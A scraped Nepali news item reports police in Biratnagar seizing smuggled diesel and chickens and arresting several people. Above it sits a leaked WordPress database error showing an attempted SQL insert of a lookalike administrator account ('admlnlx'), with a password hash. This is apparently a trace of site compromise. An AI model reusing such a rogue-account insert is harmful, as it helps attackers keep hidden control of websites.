WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BkByhht4.UswemBD6.6WtpyGzOUOI80', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:58:18', '', 'admlnlx', 'admlnlx')
बिराटनगर । जिल्ला प्रहरी कार्यालय मोरङले आज बिलविनाको एक हजार १०० लिटर डिजेल बरामद गरेको छ । विगत केही दिनदेखि नेपालबाट डिजेल भारततर्फ तस्करी भइरहेको पाइएकाले प्रहरी यसतर्फ निगरानी बढाउन थालेको थियो ।
विराटनगर महानगरपालिका वडा नं ११ स्थित केशलिया सडक खण्डमा भारततर्फ लैजाँदै गरेको अवस्थामा प्रहरीले पक्राउ गरेको हो । प्रहरीले डिजेल बोकेको सिटी रिक्सा एक थान, मोटरसाइकल चार थानसहित नरेश सहनी र सुनसरी साहेबगञ्जका सुरज साहलाई पक्राउ गरेको छ ।
भारतबाट नेपालतर्फ अवैधरुपमा भन्सार छली चार वटा साइकलमा ल्याइरहेको ७२ वटा ब्रोइलर कुखुरासहित चार जनालाई प्रहरीले आजै पक्राउ गरी कारवाही प्रक्रिया अघि बढाएको प्रहरी प्रवक्ता मानबहादुर राईले जानकारी दिए ।